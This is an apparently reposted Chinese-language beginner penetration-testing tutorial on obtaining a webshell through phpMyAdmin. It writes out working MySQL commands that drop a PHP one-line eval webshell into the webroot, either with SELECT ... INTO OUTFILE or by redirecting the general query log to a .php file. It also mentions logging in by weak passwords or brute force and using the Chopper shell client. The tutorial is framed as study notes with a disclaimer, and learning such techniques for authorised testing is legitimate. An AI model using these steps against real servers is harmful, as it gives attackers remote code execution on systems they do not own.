【滲透測試小白系列】之利用PHPMyAdmin Getshell


(本文僅為平時學習記錄,若有錯誤請大佬指出,如果本文能幫到你那我也是很開心啦)

 

該文章參考https://www.jianshu.com/p/ddd41b841c36很詳細,感謝!!!本文僅為了學習交流,嚴禁非法使用!!!

 

一、使用into outfile寫入一句話木馬

(注:使用這個方法需要知道網站的絕對路徑,可以通過報錯獲取路徑、通過phpinfo.php等等,然后寫一句話木馬到源碼的存放位置中)

1.查看全局變量中的安全文件優先級,如果該參數設置為空或指定的文件夾才可利用

show global variables like ‘%secure-file-prie%’;

  • 當secure_file_priv的值為NULL時,表示限制MySQL不允許導入導出,要想使得木馬寫入成功,則需要在mysql文件夾下修改my.ini 文件在[mysqld]內加入secure_file_priv =""
select “<?php @eval($_POST[w]);?>” into outfile “/var/www/html/muma.php”

 

二、利用PHPMyAdmin日志文件Getshell

常見的日志文件分為:業務(常見服務)日志和系統(Windows或Linux)日志

(注:MySQL 版本>5.0會創建日志文件,日志文件是全局遍歷,並可讀寫)

  • 通過弱口令或爆破的方式登錄PHPMyAdmin,執行SQL語句
select @@datadir;  查看數據存放位置
  • 猜測源碼的存放位置,D:\phpstudy_pro\www

  • 查看日志狀態
show variables like '%general%';

  • 開啟日志記錄功能,並修改記錄的路徑和文件名
set global general_log='on';

set global general_log_file='F:\\phpStudy_64\\phpstudy_pro\\www\\log.php'

  • 查看日志狀態
show variables like '%general%';

  • 在該文件中寫木馬
select "<?php eval($_POST[k]);?>"

  • 打開log.php文件,發現木馬已被寫入

  • 瀏覽器訪問,並設置k值,可以看到PHP信息,GetShell成功

 

  • 也可使用菜刀GetShell


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM